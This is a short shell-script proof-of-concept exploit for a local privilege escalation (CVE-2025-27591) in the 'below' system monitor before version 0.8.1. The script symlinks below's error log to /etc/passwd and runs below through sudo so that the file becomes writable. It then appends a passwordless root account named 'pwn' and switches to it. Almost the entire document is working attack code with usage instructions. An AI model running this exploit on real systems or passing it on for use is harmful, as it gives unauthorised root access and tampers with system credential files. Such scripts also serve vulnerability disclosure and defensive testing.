# Title  : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage  : usage: ./exploit.sh


u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry  to /etc/passwd (now writable)
su pwn